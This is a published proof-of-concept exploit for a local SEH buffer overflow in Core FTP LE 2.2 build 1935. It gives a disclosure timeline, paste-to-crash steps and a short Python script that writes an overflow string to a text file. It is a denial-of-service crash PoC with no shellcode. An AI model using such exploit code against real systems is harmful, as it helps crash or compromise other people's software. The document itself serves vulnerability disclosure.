Share
#!/usr/bin/python  
  
# Exploit Title: Core FTP LE Version 2.2, build 1935 - Local Buffer  
Overflow (SEH Unicode)  
# Vulnerability Details: Core FTP LE Version 2.2, build 1935 is prone to a  
buffer overflow vulnerability that may result in a DoS user local folder  
selection pane  
# Exploit Type : DOS  
# Date: 08-Sep-2019  
# Vulnerable Software: Core FTP LE  
# Version: Version 2.2, build 1935  
# Vendor Homepage: http://www.coreftp.com/  
# Software Link: http://www.coreftp.com/download/coreftplite.exe  
# Tested Windows : Windows Vista Ultimate SP2(32-bit), Windows 7  
Professional SP1(32-bit)  
# Exploit Author: Debashis Pal  
  
#Timeline  
# Vulnerability Discover Date: 01-Sep-2019  
# Vulnerability Report to Vendor:01-Sep-2019,No responds  
# Again email to Vendor:05-Sep-2019 ,No responds  
# Public Disclose : 08-Sep-2019  
  
# PoC  
# 1. coreftpleversion2-2build1935.txt from POC.py code, open in  
notepad(coreftpleversion2-2build1935.txt), copy contents  
# 2. Open Core FTP LE(Version 2.2, build 1935)  
# 3. Select the left interface(CORE FTP LE,local folder selection pane)  
# 4. paste contents from notepad  
# 5. Application will crash and SEH overwritten with Unicode  
  
  
  
crash = "\x43" * 585 #Junk  
crash += "\x42" * 2 #nSEH  
crash += "\x41" * 2 #SEH  
crash += "\x44" * 411 #More Junk  
  
  
file="coreftpleversion2-2build1935.txt"  
generate=open(file, "w")  
generate.write(crash)  
generate.close  
  
#Attachment: Application will crash and SEH overwritten with Unicode.jpg  
  
Thank you,  
Debashis Pal